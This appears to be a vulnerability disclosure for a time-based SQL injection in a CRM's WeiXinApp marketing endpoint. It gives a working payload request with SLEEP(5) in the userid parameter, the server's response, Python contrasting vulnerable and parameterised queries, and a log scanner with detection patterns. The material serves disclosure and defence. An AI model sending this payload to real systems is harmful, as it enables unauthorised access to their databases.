Vulnerability description
A SQL injection vulnerability is one in which an attacker inserts malicious SQL code into a web application's input fields, bypassing the application's security controls and running unauthorized operations directly against the database. It typically arises when the application does not adequately validate and filter user input, allowing the attacker to read, modify or delete data in the database, and possibly even execute arbitrary code on the server.
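As an added illustration of that last point (example code, not from this report or the vendor's product), the Python below shows a hypothetical getActionList-style lookup written two ways: concatenating the userid value into the SQL text, and binding it as a query parameter. The table, the statement and the function names are assumptions; the PAYLOAD string is the URL-decoded userid value from the request in this report, used only to show that the parameterised version treats it as plain data.

```python
import sqlite3

# Constructed in-memory table; the product's real schema is not on the page.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("1001", "alice"), ("1002", "bob")])
    return conn

def build_query_vulnerable(userid: str) -> str:
    """Hypothetical vulnerable pattern: the raw parameter is pasted into the SQL
    text, so quotes, operators and comment markers in it become part of the
    statement the database parses."""
    return f"SELECT userid, name FROM users WHERE userid = '{userid}'"

def get_action_list_vulnerable(conn: sqlite3.Connection, userid: str) -> list:
    # Works fine on benign input, which is why the defect is easy to miss.
    return conn.execute(build_query_vulnerable(userid)).fetchall()

def get_action_list_safe(conn: sqlite3.Connection, userid: str) -> list:
    """Hardened form: the statement text is fixed and the value is bound
    separately, so the engine never parses user-supplied text as SQL."""
    sql = "SELECT userid, name FROM users WHERE userid = ?"
    return conn.execute(sql, (userid,)).fetchall()

# URL-decoded userid value from the request shown in this report.
PAYLOAD = "' AND (SELECT 3408 FROM (SELECT(SLEEP(5)))HtiS)-- cbVc"

def input_escapes_literal(userid: str) -> bool:
    """True when the concatenated statement no longer has exactly the two quote
    characters of the template, i.e. the input has left the string literal.
    Note that a legitimate value such as O'Brien trips this too: concatenation
    is broken for ordinary data, not only for hostile data."""
    return build_query_vulnerable(userid).count("'") != 2

if __name__ == "__main__":
    db = make_db()
    print(get_action_list_vulnerable(db, "1001"))  # benign input: [('1001', 'alice')]
    print(get_action_list_safe(db, "1001"))        # same result, fixed statement
    print(get_action_list_safe(db, PAYLOAD))       # []: the payload is just a string
    print(build_query_vulnerable(PAYLOAD))         # SLEEP(5) now sits inside the SQL
```

The bound-parameter version is the fix: the database receives a constant statement plus a value, and the value cannot change the statement's structure regardless of what characters it contains.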
GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 08:15:24 GMT
Server: Apache
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
{"code":1,"result":{"count":{"look_nums":"0","share_nums":"0","copy_nums":"0","like_nums":"0"},"curpagenum":1,"search_reminds":"搜索用户昵称关键字","totalrows":null,"page_title":{"like":"点赞","look":"浏览","share":"分享","copy":"领取"},"pagecount":0,"havenextpage":"no","list":[]},"msg":"success","appname":"灵当软件"}
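For the detection side, here is an added Python example (not part of this report) that scans access-log style request lines for the time-based pattern visible in the request above: a SLEEP(, BENCHMARK(, pg_sleep( or WAITFOR DELAY call, or a quote followed by a SQL comment sequence, inside a URL-decoded query parameter. The log lines are constructed here; the first reuses the request path from this report and the other two are benign requests made up for contrast.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (method, path, status). Line 1 is the request path
# from this report; lines 2 and 3 are benign requests made up for contrast.
SAMPLE_LOG = """\
GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc 200
GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=1001 200
GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=O%27Brien 200
"""

# Delay functions used for time-based blind injection on common engines.
TIME_BASED = re.compile(r"(?i)\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b")
# A quote that is later followed by a SQL line or block comment opener.
QUOTE_THEN_COMMENT = re.compile(r"'.*?(?:--|/\*)", re.DOTALL)

def decode_params(path: str) -> dict:
    """URL-decode the query string into {name: value}, keeping empty values."""
    return dict(parse_qsl(urlsplit(path).query, keep_blank_values=True))

def scan_request_line(line: str) -> list:
    """Return (param, reason) findings for one 'METHOD PATH STATUS' line."""
    fields = line.split()
    if len(fields) < 2:
        return []
    findings = []
    for name, value in decode_params(fields[1]).items():
        reasons = []
        if TIME_BASED.search(value):
            reasons.append("time-based SQL function")
        if QUOTE_THEN_COMMENT.search(value):
            reasons.append("quote followed by SQL comment")
        if reasons:
            findings.append((name, "; ".join(reasons)))
    return findings

def scan_log(text: str) -> list:
    """Return (line_number, param, reason) for every suspicious parameter."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, reason in scan_request_line(line):
            hits.append((lineno, name, reason))
    return hits

if __name__ == "__main__":
    for lineno, name, reason in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: parameter {name!r}: {reason}")
```

Note that the response in the report is an ordinary 200 with an empty list, so nothing in the response body reveals the probe; the only server-side signal is the delay. Request-side inspection like this, combined with monitoring of unusually slow requests or database queries on the same endpoint, is what makes the pattern visible.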